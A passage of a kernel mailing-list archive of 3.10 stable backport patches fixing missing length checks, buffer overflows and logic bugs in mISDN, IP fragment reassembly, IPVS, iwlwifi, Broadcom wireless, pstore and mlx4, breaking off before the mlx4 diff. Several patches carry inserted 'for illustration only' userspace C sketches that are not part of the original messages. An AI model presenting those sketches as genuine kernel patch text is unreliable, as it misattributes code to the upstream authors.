+++ b/drivers/isdn/hardware/mISDN/mISDNipac.c
@@ -80,6 +80,7 @@ isac_ph_state_bh(struct dchannel *dch)
 		l1_event(dch->l1, HW_DEACT_CNF);
 		break;
 	case ISAC_IND_DR:
+	case ISAC_IND_DR6:
 		dch->state = 3;
 		l1_event(dch->l1, HW_DEACT_IND);
 		break;
@@ -660,6 +661,7 @@ isac_l1cmd(struct dchannel *dch, u32 cmd)
 		spin_lock_irqsave(isac->hwlock, flags);
 		if ((isac->state == ISAC_IND_EI) ||
 		    (isac->state == ISAC_IND_DR) ||
+		    (isac->state == ISAC_IND_DR6) ||
 		    (isac->state == ISAC_IND_RS))
 			ph_command(isac, ISAC_CMD_TIM);
 		else
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 239/319] mISDN: Fixing missing validation in base_sock_bind()
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Emrah Demir, David S . Miller, Willy Tarreau

From: Emrah Demir <ed@abdsec.com>

commit b821646826e22f0491708768fccce58eef3f5704 upstream.

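Add the missing address-length validation to base_sock_bind() in
mISDN/socket.c: reject a bind whose addr_len is smaller than
sizeof(struct sockaddr_mISDN).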

Signed-off-by: Emrah Demir <ed@abdsec.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/isdn/mISDN/socket.c | 3 +++
 1 file changed, 3 insertions(+)
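
For illustration only (not part of the patch): a minimal userspace sketch
of validating a caller-supplied address length before reading any field.
struct model_sockaddr, MODEL_AF and model_bind() are hypothetical; the
real struct sockaddr_mISDN has a different layout. Unlike the patch, the
sketch performs the length check before the family check, which is an
ordering chosen here for the example.

```c
#include <errno.h>
#include <stddef.h>

/* Hypothetical address layout for this sketch only. */
struct model_sockaddr {
	unsigned short family;
	unsigned char  dev;
	unsigned char  channel;
};

#define MODEL_AF 34	/* arbitrary family value for this sketch */

int model_bind(const void *addr, int addr_len, unsigned char *dev_out)
{
	const struct model_sockaddr *maddr = addr;

	/*
	 * Length check first: never read fields the caller did not supply.
	 * Negative lengths are rejected explicitly, because comparing a
	 * signed int against sizeof() converts it to an unsigned value.
	 */
	if (!maddr || addr_len < 0 ||
	    (size_t)addr_len < sizeof(struct model_sockaddr))
		return -EINVAL;
	if (maddr->family != MODEL_AF)
		return -EINVAL;

	*dev_out = maddr->dev;
	return 0;
}
```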

diff --git a/drivers/isdn/mISDN/socket.c b/drivers/isdn/mISDN/socket.c
index 5cefb47..00bd80a 100644
--- a/drivers/isdn/mISDN/socket.c
+++ b/drivers/isdn/mISDN/socket.c
@@ -717,6 +717,9 @@ base_sock_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
 	if (!maddr || maddr->family != AF_ISDN)
 		return -EINVAL;
 
+	if (addr_len < sizeof(struct sockaddr_mISDN))
+		return -EINVAL;
+
 	lock_sock(sk);
 
 	if (_pms(sk)->dev) {
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 240/319] net: disable fragment reassembly if high_thresh is set to zero
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Michal Kubecek, Jiri Slaby, Willy Tarreau

From: Michal Kubecek <mkubecek@suse.cz>

commit 30759219f562cfaaebe7b9c1d1c0e6b5445c69b0 upstream.

Before commit 6d7b857d541e ("net: use lib/percpu_counter API for
fragmentation mem accounting"), setting the high threshold to 0 prevented
fragment reassembly, as the first fragment would always be evicted before
the second could be added to the queue. While inefficient, some users
apparently relied on it.

Since the commit mentioned above, a percpu counter is used for
reassembly memory accounting, and a high batch size avoids taking the slow
path in most common scenarios. As a result, a whole full-sized packet can
be reassembled without the percpu counter's main counter changing its
value, so that even with high_thresh set to 0, fragmented packets can
still be reassembled and processed.

Add explicit checks preventing reassembly if high threshold is zero.

[mk] backport to 3.12

Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/ip_fragment.c                  | 4 ++++
 net/ipv6/netfilter/nf_conntrack_reasm.c | 3 +++
 net/ipv6/reassembly.c                   | 4 ++++
 3 files changed, 11 insertions(+)
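
For illustration only (not part of the patch): a simplified userspace
model of a batched per-CPU counter, showing why a check against the shared
total can miss memory that is still held in per-CPU deltas. All names and
the batch value used with it are assumptions for this sketch; the real
percpu_counter also handles locking and CPU hotplug.

```c
#include <stdbool.h>

#define MODEL_NCPUS 2

/* Hypothetical model of a batched per-CPU counter. */
struct model_pcpu_counter {
	long count;			/* shared, approximate total */
	long local[MODEL_NCPUS];	/* per-CPU deltas not yet folded in */
	long batch;			/* fold threshold */
};

/* Add 'amount' on 'cpu'; touch the shared total only past the batch size. */
void model_counter_add(struct model_pcpu_counter *c, int cpu, long amount)
{
	long v = c->local[cpu] + amount;

	if (v >= c->batch || v <= -c->batch) {
		c->count += v;
		c->local[cpu] = 0;
	} else {
		c->local[cpu] = v;
	}
}

/* Threshold-only check: looks at the shared total and nothing else. */
bool model_over_limit(const struct model_pcpu_counter *c, long high_thresh)
{
	return c->count > high_thresh;
}

/* Check with the explicit rule: a zero threshold disables reassembly. */
bool model_may_reassemble(const struct model_pcpu_counter *c, long high_thresh)
{
	if (!high_thresh)
		return false;
	return !model_over_limit(c, high_thresh);
}
```

In this model, ten 1500-byte fragments accounted on one CPU with a large
batch leave the shared total at 0, so the threshold-only check never fires
for high_thresh == 0, while the explicit zero test refuses reassembly.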

diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c
index 4d98a6b..04c7e46 100644
--- a/net/ipv4/ip_fragment.c
+++ b/net/ipv4/ip_fragment.c
@@ -656,6 +656,9 @@ int ip_defrag(struct sk_buff *skb, u32 user)
 	net = skb->dev ? dev_net(skb->dev) : dev_net(skb_dst(skb)->dev);
 	IP_INC_STATS_BH(net, IPSTATS_MIB_REASMREQDS);
 
+	if (!net->ipv4.frags.high_thresh)
+		goto fail;
+
 	/* Start by cleaning up the memory. */
 	ip_evictor(net);
 
@@ -672,6 +675,7 @@ int ip_defrag(struct sk_buff *skb, u32 user)
 		return ret;
 	}
 
+fail:
 	IP_INC_STATS_BH(net, IPSTATS_MIB_REASMFAILS);
 	kfree_skb(skb);
 	return -ENOMEM;
diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
index 7cd6235..c11a40c 100644
--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
+++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
@@ -569,6 +569,9 @@ struct sk_buff *nf_ct_frag6_gather(struct sk_buff *skb, u32 user)
 	if (find_prev_fhdr(skb, &prevhdr, &nhoff, &fhoff) < 0)
 		return skb;
 
+	if (!net->nf_frag.frags.high_thresh)
+		return skb;
+
 	clone = skb_clone(skb, GFP_ATOMIC);
 	if (clone == NULL) {
 		pr_debug("Can't clone skb\n");
diff --git a/net/ipv6/reassembly.c b/net/ipv6/reassembly.c
index a1fb511..1a5318e 100644
--- a/net/ipv6/reassembly.c
+++ b/net/ipv6/reassembly.c
@@ -556,6 +556,9 @@ static int ipv6_frag_rcv(struct sk_buff *skb)
 		return 1;
 	}
 
+	if (!net->ipv6.frags.high_thresh)
+		goto fail_mem;
+
 	evicted = inet_frag_evictor(&net->ipv6.frags, &ip6_frags, false);
 	if (evicted)
 		IP6_ADD_STATS_BH(net, ip6_dst_idev(skb_dst(skb)),
@@ -575,6 +578,7 @@ static int ipv6_frag_rcv(struct sk_buff *skb)
 		return ret;
 	}
 
+fail_mem:
 	IP6_INC_STATS_BH(net, ip6_dst_idev(skb_dst(skb)), IPSTATS_MIB_REASMFAILS);
 	kfree_skb(skb);
 	return -1;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 241/319] ipvs: count pre-established TCP states as active
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Michal Kubecek, Simon Horman, Willy Tarreau

From: Michal Kubecek <mkubecek@suse.cz>

commit be2cef49904b34dd5f75d96bbc8cd8341bab1bc0 upstream.

Some users observed that the "least connection" distribution algorithm
doesn't handle bursts of TCP connections from reconnecting clients well
after a node or network failure.

This is because the algorithm counts an active connection as worth 256
inactive ones where, for TCP, "active" only means TCP connections in the
ESTABLISHED state. In case of a connection burst, new connections are
handled before previous ones have finished the three-way handshake, so
that all are still counted as "inactive", i.e. cheap ones. They become
"active" quickly, but by that time all of them are already assigned to one
real server (or a few), resulting in a highly unbalanced distribution.

Address this by counting the "pre-established" states as "active".

Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/netfilter/ipvs/ip_vs_proto_tcp.c | 25 +++++++++++++++++++++++--
 1 file changed, 23 insertions(+), 2 deletions(-)
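
For illustration only (not part of the patch): a small userspace sketch
of the 256:1 weighting described above and of how it skews server
selection during a burst. struct model_dest, model_lc_overhead() and
model_lc_pick() are hypothetical names for this example.

```c
/* Hypothetical per-server counters. */
struct model_dest {
	int activeconns;
	int inactconns;
};

/* An active connection weighs as much as 256 inactive ones (shift by 8). */
unsigned int model_lc_overhead(const struct model_dest *d)
{
	return ((unsigned int)d->activeconns << 8) + (unsigned int)d->inactconns;
}

/* Return the index of the server with the lowest overhead; ties go first. */
int model_lc_pick(const struct model_dest *dests, int n)
{
	int best = 0;

	for (int i = 1; i < n; i++)
		if (model_lc_overhead(&dests[i]) < model_lc_overhead(&dests[best]))
			best = i;
	return best;
}
```

With one established connection on server 0 (overhead 256) and 200
half-open connections on server 1 counted as inactive (overhead 200),
the next connection still goes to server 1. Counting those 200 as active
gives server 1 an overhead of 51200, and server 0 is picked instead.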

diff --git a/net/netfilter/ipvs/ip_vs_proto_tcp.c b/net/netfilter/ipvs/ip_vs_proto_tcp.c
index 50a1594..3032ede 100644
--- a/net/netfilter/ipvs/ip_vs_proto_tcp.c
+++ b/net/netfilter/ipvs/ip_vs_proto_tcp.c
@@ -373,6 +373,20 @@ static const char *const tcp_state_name_table[IP_VS_TCP_S_LAST+1] = {
 	[IP_VS_TCP_S_LAST]		=	"BUG!",
 };
 
+static const bool tcp_state_active_table[IP_VS_TCP_S_LAST] = {
+	[IP_VS_TCP_S_NONE]		=	false,
+	[IP_VS_TCP_S_ESTABLISHED]	=	true,
+	[IP_VS_TCP_S_SYN_SENT]		=	true,
+	[IP_VS_TCP_S_SYN_RECV]		=	true,
+	[IP_VS_TCP_S_FIN_WAIT]		=	false,
+	[IP_VS_TCP_S_TIME_WAIT]		=	false,
+	[IP_VS_TCP_S_CLOSE]		=	false,
+	[IP_VS_TCP_S_CLOSE_WAIT]	=	false,
+	[IP_VS_TCP_S_LAST_ACK]		=	false,
+	[IP_VS_TCP_S_LISTEN]		=	false,
+	[IP_VS_TCP_S_SYNACK]		=	true,
+};
+
 #define sNO IP_VS_TCP_S_NONE
 #define sES IP_VS_TCP_S_ESTABLISHED
 #define sSS IP_VS_TCP_S_SYN_SENT
@@ -396,6 +410,13 @@ static const char * tcp_state_name(int state)
 	return tcp_state_name_table[state] ? tcp_state_name_table[state] : "?";
 }
 
+static bool tcp_state_active(int state)
+{
+	if (state >= IP_VS_TCP_S_LAST)
+		return false;
+	return tcp_state_active_table[state];
+}
+
 static struct tcp_states_t tcp_states [] = {
 /*	INPUT */
 /*        sNO, sES, sSS, sSR, sFW, sTW, sCL, sCW, sLA, sLI, sSA	*/
@@ -518,12 +539,12 @@ set_tcp_state(struct ip_vs_proto_data *pd, struct ip_vs_conn *cp,
 
 		if (dest) {
 			if (!(cp->flags & IP_VS_CONN_F_INACTIVE) &&
-			    (new_state != IP_VS_TCP_S_ESTABLISHED)) {
+			    !tcp_state_active(new_state)) {
 				atomic_dec(&dest->activeconns);
 				atomic_inc(&dest->inactconns);
 				cp->flags |= IP_VS_CONN_F_INACTIVE;
 			} else if ((cp->flags & IP_VS_CONN_F_INACTIVE) &&
-				   (new_state == IP_VS_TCP_S_ESTABLISHED)) {
+				   tcp_state_active(new_state)) {
 				atomic_inc(&dest->activeconns);
 				atomic_dec(&dest->inactconns);
 				cp->flags &= ~IP_VS_CONN_F_INACTIVE;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 242/319] iwlwifi: pcie: fix access to scratch buffer
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Sara Sharon, Luca Coelho, Willy Tarreau

From: Sara Sharon <sara.sharon@intel.com>

commit d5d0689aefc59c6a5352ca25d7e6d47d03f543ce upstream.

This fixes a pretty ancient bug that hasn't manifested itself
until now.
The scratchbuf for the command queue is allocated for only 32 slots
but is accessed with the queue write pointer, which can be
up to 256.
Since the scratch buf size was 16 and there are up to 256 TFDs,
we never crossed a page boundary when accessing the scratch buffer,
but when attempting to increase the size of the scratch buffer, a
panic quickly followed once an access crossed a page boundary.

Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Fixes: 38c0f334b359 ("iwlwifi: use coherent DMA memory for command header")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/iwlwifi/pcie/tx.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
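
For illustration only (not part of the patch): a userspace sketch of
indexing a 32-slot array from a write pointer that runs over 256
positions. It assumes the slot index is obtained by masking the write
pointer with the (power-of-two) window size; the names and constants are
hypothetical and only mirror the numbers quoted above.

```c
#include <string.h>

#define MODEL_QUEUE_SIZE   256	/* write pointer range */
#define MODEL_WINDOW        32	/* slots actually allocated */
#define MODEL_SCRATCH_SIZE  16	/* bytes per slot */

struct model_txq {
	unsigned char scratchbufs[MODEL_WINDOW][MODEL_SCRATCH_SIZE];
	int write_ptr;
};

/* Map a queue position onto an allocated slot (window is a power of two). */
int model_cmd_index(int write_ptr)
{
	return write_ptr & (MODEL_WINDOW - 1);
}

/* Copy a header into the slot for the current write pointer; returns the slot. */
int model_enqueue(struct model_txq *q, const void *hdr, size_t len)
{
	int idx = model_cmd_index(q->write_ptr);

	if (len > MODEL_SCRATCH_SIZE)
		len = MODEL_SCRATCH_SIZE;
	memcpy(q->scratchbufs[idx], hdr, len);
	q->write_ptr = (q->write_ptr + 1) & (MODEL_QUEUE_SIZE - 1);
	return idx;
}
```

Indexing scratchbufs with the raw write pointer (for example 200) would
reach far past the 32 allocated slots; the masked index (8 in that case)
always stays inside the array.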

diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c
index f05962c..2e3a0d7 100644
--- a/drivers/net/wireless/iwlwifi/pcie/tx.c
+++ b/drivers/net/wireless/iwlwifi/pcie/tx.c
@@ -1311,9 +1311,9 @@ static int iwl_pcie_enqueue_hcmd(struct iwl_trans *trans,
 
 	/* start the TFD with the scratchbuf */
 	scratch_size = min_t(int, copy_size, IWL_HCMD_SCRATCHBUF_SIZE);
-	memcpy(&txq->scratchbufs[q->write_ptr], &out_cmd->hdr, scratch_size);
+	memcpy(&txq->scratchbufs[idx], &out_cmd->hdr, scratch_size);
 	iwl_pcie_txq_build_tfd(trans, txq,
-			       iwl_pcie_get_scratchbuf_dma(txq, q->write_ptr),
+			       iwl_pcie_get_scratchbuf_dma(txq, idx),
 			       scratch_size, 1);
 
 	/* map first command fragment, if any remains */
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 243/319] svc: Avoid garbage replies when pc_func() returns rpc_drop_reply
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Chuck Lever, Anna Schumaker, Willy Tarreau

From: Chuck Lever <chuck.lever@oracle.com>

commit 0533b13072f4bf35738290d2cf9e299c7bc6c42a upstream.

If an RPC program does not set vs_dispatch and pc_func() returns
rpc_drop_reply, the server sends a reply anyway, consisting of a single
word with the value RPC_DROP_REPLY (in network byte-order, of
course). This is a nonsense RPC message.

Fixes: 9e701c610923 ("svcrpc: simpler request dropping")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Steve Wise <swise@opengridcomputing.com>
Signed-off-by: Anna Schumaker <Anna.Schumaker@Netapp.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sunrpc/svc.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
index 6dee8fb..c996a71 100644
--- a/net/sunrpc/svc.c
+++ b/net/sunrpc/svc.c
@@ -1182,7 +1182,8 @@ svc_process_common(struct svc_rqst *rqstp, struct kvec *argv, struct kvec *resv)
 		*statp = procp->pc_func(rqstp, rqstp->rq_argp, rqstp->rq_resp);
 
 		/* Encode reply */
-		if (rqstp->rq_dropme) {
+		if (*statp == rpc_drop_reply ||
+		    rqstp->rq_dropme) {
 			if (procp->pc_release)
 				procp->pc_release(rqstp, NULL, rqstp->rq_resp);
 			goto dropit;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 244/319] brcmsmac: Free packet if dma_mapping_error() fails in dma_rxfill
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Florian Fainelli, Kalle Valo, Willy Tarreau

From: Florian Fainelli <f.fainelli@gmail.com>

commit 5c5fa1f464ac954982df1d96b9f9a5103d21aedd upstream.

In case dma_mapping_error() returns an error in dma_rxfill, we would be
leaking a packet that we allocated with brcmu_pkt_buf_get_skb().

Reported-by: coverity (CID 1081819)
Fixes: 67d0cf50bd32 ("brcmsmac: Fix WARNING caused by lack of calls to dma_mapping_error()")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Acked-by: Arend van Spriel <arend@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/brcm80211/brcmsmac/dma.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/drivers/net/wireless/brcm80211/brcmsmac/dma.c b/drivers/net/wireless/brcm80211/brcmsmac/dma.c
index 4fb9635..7660b52 100644
--- a/drivers/net/wireless/brcm80211/brcmsmac/dma.c
+++ b/drivers/net/wireless/brcm80211/brcmsmac/dma.c
@@ -1079,8 +1079,10 @@ bool dma_rxfill(struct dma_pub *pub)
 
 		pa = dma_map_single(di->dmadev, p->data, di->rxbufsize,
 				    DMA_FROM_DEVICE);
-		if (dma_mapping_error(di->dmadev, pa))
+		if (dma_mapping_error(di->dmadev, pa)) {
+			brcmu_pkt_buf_free_skb(p);
 			return false;
+		}
 
 		/* save the free packet pointer */
 		di->rxp[rxout] = p;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 245/319] brcmsmac: Initialize power in brcms_c_stf_ss_algo_channel_get()
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Florian Fainelli, Kalle Valo, Willy Tarreau

From: Florian Fainelli <f.fainelli@gmail.com>

commit f823a2aa8f4674c095a5413b9e3ba12d82df06f2 upstream.

wlc_phy_txpower_get_current() does a logical OR of power->flags, which
presumes that power.flags was initialized earlier by the caller.
Unfortunately, this is not the case, so make sure we zero out the struct
tx_power before calling into wlc_phy_txpower_get_current().

Reported-by: coverity (CID 146011)
Fixes: 5b435de0d7868 ("net: wireless: add brcm80211 drivers")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Acked-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/brcm80211/brcmsmac/stf.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
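
For illustration only (not part of the patch): a userspace sketch of a
callee that only ORs bits into a caller-provided struct, and of a caller
that zero-initializes the struct first. The struct layout, flag values
and function names are hypothetical. The sketch uses "= { 0 }", the
portable spelling; the empty-brace form used in the patch is a GNU C
extension.

```c
#include <stdint.h>

#define MODEL_FLAG_A 0x1u	/* hypothetical flag bits */
#define MODEL_FLAG_B 0x2u

struct model_tx_power {
	uint32_t flags;
	uint8_t  limits[4];
};

/* Callee only ORs bits in, so it relies on the caller's initial value. */
void model_get_current(struct model_tx_power *p, int hw_capable)
{
	p->flags |= MODEL_FLAG_A;
	if (hw_capable)
		p->flags |= MODEL_FLAG_B;
}

/* Caller zero-initializes the struct before handing it to the callee. */
uint32_t model_query_flags(int hw_capable)
{
	struct model_tx_power power = { 0 };

	model_get_current(&power, hw_capable);
	return power.flags;
}
```

Without the initializer, power.flags would start with whatever happened
to be on the stack, and the OR would preserve those stray bits.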

diff --git a/drivers/net/wireless/brcm80211/brcmsmac/stf.c b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
index dd91627..0ab865d 100644
--- a/drivers/net/wireless/brcm80211/brcmsmac/stf.c
+++ b/drivers/net/wireless/brcm80211/brcmsmac/stf.c
@@ -87,7 +87,7 @@ void
 brcms_c_stf_ss_algo_channel_get(struct brcms_c_info *wlc, u16 *ss_algo_channel,
 			    u16 chanspec)
 {
-	struct tx_power power;
+	struct tx_power power = { };
 	u8 siso_mcs_id, cdd_mcs_id, stbc_mcs_id;
 
 	/* Clear previous settings */
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 246/319] brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Arend Van Spriel, Kalle Valo, Willy Tarreau

From: Arend Van Spriel <arend.vanspriel@broadcom.com>

commit ded89912156b1a47d940a0c954c43afbabd0c42c upstream.

User-space can choose to omit NL80211_ATTR_SSID and only provide raw
IE TLV data. When doing so, it can provide an SSID IE with a length
exceeding the allowed size. The driver further processes this IE, copying
it into a local variable without checking the length. Hence the stack can
be corrupted, which can be exploited.

Reported-by: Daxing Guo <freener.gdx@gmail.com>
Reviewed-by: Hante Meuleman <hante.meuleman@broadcom.com>
Reviewed-by: Pieter-Paul Giesberts <pieter-paul.giesberts@broadcom.com>
Reviewed-by: Franky Lin <franky.lin@broadcom.com>
Signed-off-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
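
For illustration only (not part of the patch): a userspace sketch of
bounding a TLV length field before copying into a fixed-size buffer.
struct model_ie, struct model_ssid and model_copy_ssid() are hypothetical
types and names; only the 32-octet SSID limit is taken from 802.11.

```c
#include <errno.h>
#include <stdint.h>
#include <string.h>

#define MODEL_MAX_SSID_LEN 32	/* 802.11 SSIDs are at most 32 octets */

/* Hypothetical TLV view of an information element. */
struct model_ie {
	uint8_t id;
	uint8_t len;		/* attacker-controlled, up to 255 */
	const uint8_t *data;
};

struct model_ssid {
	uint32_t len;
	uint8_t  ssid[MODEL_MAX_SSID_LEN];
};

/* Reject a missing or oversized element before the copy. */
int model_copy_ssid(struct model_ssid *dst, const struct model_ie *ie)
{
	if (!ie || ie->len > MODEL_MAX_SSID_LEN)
		return -EINVAL;

	memcpy(dst->ssid, ie->data, ie->len);
	dst->len = ie->len;
	return 0;
}
```

A one-byte length field can claim up to 255 bytes, so without the bound
the memcpy() could write up to 223 bytes past a 32-byte destination.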

diff --git a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
index 301e572..2c52430 100644
--- a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
+++ b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c
@@ -3726,7 +3726,7 @@ brcmf_cfg80211_start_ap(struct wiphy *wiphy, struct net_device *ndev,
 				(u8 *)&settings->beacon.head[ie_offset],
 				settings->beacon.head_len - ie_offset,
 				WLAN_EID_SSID);
-		if (!ssid_ie)
+		if (!ssid_ie || ssid_ie->len > IEEE80211_MAX_SSID_LEN)
 			return -EINVAL;
 
 		memcpy(ssid_le.SSID, ssid_ie->data, ssid_ie->len);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 247/319] pstore: Fix buffer overflow while write offset equal to buffer size
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Liu ShuoX, Tony Luck, Willy Tarreau

From: Liu ShuoX <shuox.liu@intel.com>

commit 017321cf390045dd4c4afc4a232995ea50bcf66d upstream.

If the new offset is equal to prz->buffer_size, it is not wrapped at that
time, and the old (overflowing) value is returned the next time.

Signed-off-by: Liu ShuoX <shuox.liu@intel.com>
Acked-by: Kees Cook <keescook@chromium.org>
Signed-off-by: Tony Luck <tony.luck@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/pstore/ram_core.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
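
For illustration only (not part of the patch): a userspace sketch of the
off-by-one in the wrap condition, leaving out the atomics. The function
names are hypothetical, and size is assumed to be non-zero.

```c
#include <stddef.h>

/* Wrap with '>': lets the offset rest at exactly 'size', one past the end. */
size_t model_wrap_old(size_t start, size_t add, size_t size)
{
	size_t pos = start + add;

	while (pos > size)
		pos -= size;
	return pos;
}

/* Wrap with '>=': valid offsets are 0 .. size - 1. */
size_t model_wrap_new(size_t start, size_t add, size_t size)
{
	size_t pos = start + add;

	while (pos >= size)
		pos -= size;
	return pos;
}
```

For a 16-byte buffer, start 12 plus 4 bytes gives offset 16 with the old
condition, which is outside the buffer, and offset 0 with the new one.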

diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
index bda61a7..0b367ef 100644
--- a/fs/pstore/ram_core.c
+++ b/fs/pstore/ram_core.c
@@ -54,7 +54,7 @@ static size_t buffer_start_add_atomic(struct persistent_ram_zone *prz, size_t a)
 	do {
 		old = atomic_read(&prz->buffer->start);
 		new = old + a;
-		while (unlikely(new > prz->buffer_size))
+		while (unlikely(new >= prz->buffer_size))
 			new -= prz->buffer_size;
 	} while (atomic_cmpxchg(&prz->buffer->start, old, new) != old);
 
@@ -91,7 +91,7 @@ static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a)
 
 	old = atomic_read(&prz->buffer->start);
 	new = old + a;
-	while (unlikely(new > prz->buffer_size))
+	while (unlikely(new >= prz->buffer_size))
 		new -= prz->buffer_size;
 	atomic_set(&prz->buffer->start, new);
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 248/319] net/mlx4_core: Allow resetting VF admin mac to zero
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jack Morgenstein, David S . Miller, Juerg Haefliger, Willy Tarreau

From: Jack Morgenstein <jackm@dev.mellanox.co.il>

commit 6e5224224faa50ec4c8949dcefadf895e565f0d1 upstream.

The VF administrative mac addresses (stored in the PF driver) are
initialized to zero when the PF driver starts up.

These addresses may be modified in the PF driver through ndo calls
initiated by iproute2 or libvirt.

While we allow the PF/host to change the VF admin mac address from zero
to a valid unicast mac, we do not allow restoring the VF admin mac to
zero. We currently only allow changing this mac to a different unicast mac.

This leads to problems when libvirt scripts are used to deal with
VF mac addresses, and libvirt attempts to revoke the mac so this
host will not use it anymore.

Fix this by allowing resetting a VF administrative MAC back to zero.
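
As an illustration of why the one-line change is enough, here is a minimal
userspace sketch of the two predicates. The helpers are re-implemented
here, modeled on the kernel's etherdevice.h semantics, and the
vf_mac_accepted_*() and vf_mac_self_check() names are hypothetical and not
part of the driver. An all-zero address is not multicast, so it passes the
new check while multicast and broadcast addresses are still rejected.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define ETH_ALEN 6

/* Multicast and broadcast addresses have the low bit of the first octet set. */
static inline bool is_multicast_ether_addr(const uint8_t *addr)
{
	return (addr[0] & 0x01) != 0;
}

static inline bool is_zero_ether_addr(const uint8_t *addr)
{
	for (int i = 0; i < ETH_ALEN; i++)
		if (addr[i] != 0)
			return false;
	return true;
}

/* "Valid" means a usable unicast address: not multicast and not all-zero. */
static inline bool is_valid_ether_addr(const uint8_t *addr)
{
	return !is_multicast_ether_addr(addr) && !is_zero_ether_addr(addr);
}

/* Check before the patch: the all-zero address is rejected. */
static inline bool vf_mac_accepted_old(const uint8_t *mac)
{
	return is_valid_ether_addr(mac);
}

/* Check after the patch: only multicast is rejected, so all-zero passes. */
static inline bool vf_mac_accepted_new(const uint8_t *mac)
{
	return !is_multicast_ether_addr(mac);
}

/* Hypothetical self-check exercising both predicates. */
static inline void vf_mac_self_check(void)
{
	const uint8_t zero[ETH_ALEN]  = { 0 };
	const uint8_t ucast[ETH_ALEN] = { 0x00, 0x02, 0xc9, 0x0a, 0x0b, 0x0c };
	const uint8_t mcast[ETH_ALEN] = { 0x01, 0x00, 0x5e, 0x00, 0x00, 0x01 };

	assert(!vf_mac_accepted_old(zero) && vf_mac_accepted_new(zero));
	assert(vf_mac_accepted_old(ucast) && vf_mac_accepted_new(ucast));
	assert(!vf_mac_accepted_old(mcast) && !vf_mac_accepted_new(mcast));
}
```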

Fixes: 8f7ba3ca12f6 ('net/mlx4: Add set VF mac address support')
Signed-off-by: Jack Morgenstein <jackm@dev.mellanox.co.il>
Reported-by: Moshe Levi <moshele@mellanox.com>
